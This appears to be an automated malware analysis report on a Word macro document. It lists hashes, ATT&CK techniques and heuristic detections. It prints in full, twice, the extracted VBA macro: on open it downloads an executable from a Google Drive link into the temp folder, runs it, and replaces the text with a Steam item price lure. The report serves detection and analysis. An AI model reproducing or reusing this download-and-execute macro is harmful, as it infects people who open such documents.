Office (OLE) malware analysis — malicious · c843aef07b285a42

MALICIOUS

Office (OLE)

37.0 KB Created: 2014-06-13 19:43:00 Authoring application: Microsoft Office Word First seen: 2015-03-15

MD5: e32633b2e0da8bd2c5d209277029f6b8 SHA-1: 1f59cf0dc44f0e29643c87c5af726d942e4669dc SHA-256: c843aef07b285a423c504c3229af7acac8150159a6794d9c4f012688fc3926a2

270 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains VBA macros that utilize the URLDownloadToFile API to download a payload from a remote URL. The AutoOpen macro is triggered upon opening the document, and the embedded document body text prompts the user to 'Enable Content' to view the document, which is a common lure for macro-enabled malicious documents. The script attempts to download a file to the temporary directory.

Heuristics 8

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
        Shell (LocalFile)
```

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://docs.google.com/uc?authuser=0&id=0B0BdRIbIXyBrNlM4UVNzS3RTcVU&export=download Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2437 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2437 bytes
SHA-256: `3b71cb099e71215e6eb838b1f3e8c30d72dc05d0998263ab9f6a320aeb3b5005`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If VBA7 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function PathFileExists Lib "shlwapi" Alias "PathFileExistsA" _ (ByVal pszPath As String) As Long Private Declare PtrSafe Function GetTempPath Lib "kernel32" Alias "GetTempPathA" _ (ByVal nBufferLength As Long, _ ByVal lpBuffer As String) _ As Long #Else Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Private Declare Function PathFileExists Lib "shlwapi" Alias "PathFileExistsA" _ (ByVal pszPath As String) As Long Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" _ (ByVal nBufferLength As Long, _ ByVal lpBuffer As String) _ As Long #End If Sub AutoOpen() Dim ret As Long Dim HTTPfile As String, LocalFile As String Dim sBuffer As String Dim sPath As String Dim lBufPath As Long sBuffer = Space(370) lBufPath = GetTempPath(370, sBuffer) sPath = Left$(sBuffer, lBufPath) HTTPfile = "https://docs.google.com/uc?authuser=0&id=0B0BdRIbIXyBrNlM4UVNzS3RTcVU&export=download" LocalFile = sPath & "sustem.exe" ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0) Dim CurDirBackup As String If PathFileExists(LocalFile) = 1 Then Shell (LocalFile) End If Selection.WholeStory Selection.Delete Unit:=wdCharacter, Count:=1 Selection.TypeText Text:="Price keys :" + "DOTA 2 - 2.5$" + "CSGO - 2$" + "Knifes - 70% of price Steam Market" + "And all other items - 60% of price Steam Market" End Sub

SHA-256: 3b71cb099e71215e6eb838b1f3e8c30d72dc05d0998263ab9f6a320aeb3b5005

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function PathFileExists Lib "shlwapi" Alias "PathFileExistsA" _
(ByVal pszPath As String) As Long
Private Declare PtrSafe Function GetTempPath Lib "kernel32" Alias "GetTempPathA" _
                          (ByVal nBufferLength As Long, _
                           ByVal lpBuffer As String) _
                           As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function PathFileExists Lib "shlwapi" Alias "PathFileExistsA" _
(ByVal pszPath As String) As Long
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" _
                          (ByVal nBufferLength As Long, _
                           ByVal lpBuffer As String) _
                           As Long
#End If

Sub AutoOpen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String
        Dim sBuffer As String
        Dim sPath As String
        Dim lBufPath As Long
        
        sBuffer = Space(370)
        lBufPath = GetTempPath(370, sBuffer)
        sPath = Left$(sBuffer, lBufPath)

        HTTPfile = "https://docs.google.com/uc?authuser=0&id=0B0BdRIbIXyBrNlM4UVNzS3RTcVU&export=download"
        LocalFile = sPath & "sustem.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        If PathFileExists(LocalFile) = 1 Then
        Shell (LocalFile)
        End If
        Selection.WholeStory
        Selection.Delete Unit:=wdCharacter, Count:=1
        Selection.TypeText Text:="Price keys :" + "DOTA 2 -  2.5$" + "CSGO - 2$" + "Knifes -  70% of price Steam Market" + "And all other items - 60% of price Steam Market"
    
        
        End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.